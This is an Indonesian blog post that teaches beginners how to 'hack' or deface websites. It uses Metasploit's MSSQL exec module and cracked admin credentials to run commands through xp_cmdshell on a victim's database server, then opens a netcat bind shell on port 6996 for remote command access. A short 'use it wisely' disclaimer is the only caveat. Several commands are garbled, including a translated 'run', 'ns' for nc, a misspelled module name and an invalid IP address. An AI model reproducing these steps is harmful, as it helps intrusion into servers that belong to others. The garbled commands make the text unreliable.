Inilah Cara Ampuh Hack Website Menggunakan CMD

0
70

 

Hacking merupakan tindakan untuk meretas suatu sistem keamanan seperti website atau layanan online lainnya dengan menggunakan trick tertentu.

Terdapat banyak cara untuk bisa meretas atau hack berbasis data dan sebagian besar merupakan teknik atau metode injeksi SQL yang merupakan cara mengirim perintah SQL kembali ke database dari formulir suatu web.

Untuk meretas atau hack atau istilah hackernya adalah deface website bisa dilakukan dengan injeksi SQL untuk mendapatkan akses server yang mendasarinya.

Hampir pada semua database komersial memiliki prosedur yang tersimpan pada dalam sistem. Hal ini merupakan kode yang disediakan oleh sanga pengembang untuk membantu administrator sistem yang menyelesaikan tugas-tugas umum.

Untuk bisa mengaktifkan SP dari jarak jauh maka kamu memerlukan kredensial login dari admin sistem sebuah website yang akan kamu deface / hack atau retas.

Kamu bisa menggunakan alat seperti SQL dict atau modul bantu Metasploit sendiri agar bisa mendapatkan sata sandi atau password suatu website yang kamu retas.

Jika kamu menjalankan perintah pada CMD pada sistem korban, kamu tidak bisa hanya menjalankan pengintaian di atasnya, tetapi kamu bisa memilikinya dengan pengetahuan dan ilmu tentang sistem perintah Windows.

Lalu bagaimana untuk deface/hack website menggunakan CMD dengan mudah untuk pemula?

Berikut cara hack atau retas website menggunakan CMD dengan sangat mudah untuk pemula.

Untuk hack sebuah website yang kamu targetkan maka kamu memerlukan sebuah perangkat komputer atau laptop dengan memanfaatkan tool CMD atau command prompt.

Kamu juga bisa menggunakan cara ini dengan cukup mudah karena tidak memerlikan coding atau bahasa pemrograman yang cukup rumit yang sering diguanakn oleh para hacker.

Cara hack website menggunakan CMD dengan mudah untuk pemula :

1. Pertama-tama untuk hack atau meretas sebuah website maka kamu perlu menjalankan atau membuka tool cmd atau aplikasi terminal.

2. Langkah kedua, kamu bisa mulai konsol metasploit dengan mengetikan code dibawah ini:

kali>msfconsole

3. Langkah ketiga, kamu bisa membuat modul Auxiliary dengan membuat modul tambahan msql_exec.

msf>info

Dengan demikian maka kamu akan memiliki beberapa variabel kunci yang harus kamu tetapkan termasuk CMD, RHOST serta Password. Kamu bisa mengatur RHOST ke IP server database, password ke kata sandi akun yang dicrack sebelumnya, dan perintah yang harus dijalankan pada shell perintah di server yakni “dir” agar mendapatkan daftar direktory. Pastikan juga bahwa kamu mengetik perinyahny pada diantara tanda kutip tunggal.

Baca Juga : Cara Hack/Deface Situs Website Metode XSS Dan SQL

Setelah variabel-variabel tersebut telah ditetapkan maka kamu selanjutnya cukup ketik “run

msf>jalankan

Mudil tersebut akan mengakses prosedur tersimpan xp_cmdshell meskipun dinonaktifkan dan akan mengembalikan hasil perintah.

4. Langkah keempat, kamu bisa mengirimkan perintah tunggal dengan baik namun tidak boleh ada banyak tindakan yang dapay kamu lakukan dengan satu perintah dengan pengecualian penghapusan file atau del. Kamu dapat mengirimakan perintah dengan meletakan “&” pada antara perintah msf>set CMD ‘cd/ & dir’

5. Langkah kelima, Kamu bisa menjalankan aplikasi tersembunyi. Kamu mungkin telah memperhatikan bahwa admin pada sistem server memiliki Netcat yang dapat dijalankan di derektory root, Mereka mungkin meninggalkannya di sana untuk administrasi jarak jauh atau untuk tugas lain. Setelah itu, kamu bisa menjalankan perintah dibawah ini:

msf > set CMD 'cd \ & nc -L -p6996 -e cmd.exe'

Perintah tersebut akan mengubah direktori ke direktori root tempat Netcat tinggal dan selanjutnya membuka pendengar Netcat pada port 6996 dan menekan shell perintah.

Setelah itu kamu coba untuk terhubung pada Netcat.

msf > ns 192.169.?.?.? 6996

6 Berhasil, kamu sudah berhasil hack website dengan menggunakan cmd.

Namun, kamu perlu menggunakan cara diatas dengan bijak dan tidak merugikan orang lai atau pihak lain.

Kamu bisa menggunakan cara diatas untuk hal positif seperti untuk digunakan sebagai pembelajaran agar lebih waspada terhadap peretasan website atau untuk mengatasi website yang lupa password atau tidak bisa login dengan normal.

Intinya, sebaiknya kamu gunakan cara diatas dengan baik dan bijak agar bisa bermanfaat dan tidak merugikan.

Baca Juga Cara Deface Via Aplikasi Android Tanpa ROOT dengan SQLI

Nah, itu dia cara meretas website menggunakan cmd dengan ampuh yang bisa kamu gunakan untuk pembelajaran agar lebih berhati-hati dalam pertasan website.

Cara diatas cukup sering diguakan oleh para hacker untuk meretas atau hack suatu website karena memiliki tingkat keberhasilan dalam meretas website cukup tinggi.

Namun, cara diatas juga sangat sensitif, dimana jika salah sedikit saja maka cara diatas bisa gagal.

LEAVE A REPLY

Please enter your comment!
Please enter your name here